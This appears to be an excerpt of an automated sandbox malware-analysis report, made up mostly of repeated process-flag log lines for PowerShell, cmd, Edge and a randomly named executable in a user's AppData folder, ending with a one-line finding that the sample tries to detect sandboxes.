Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

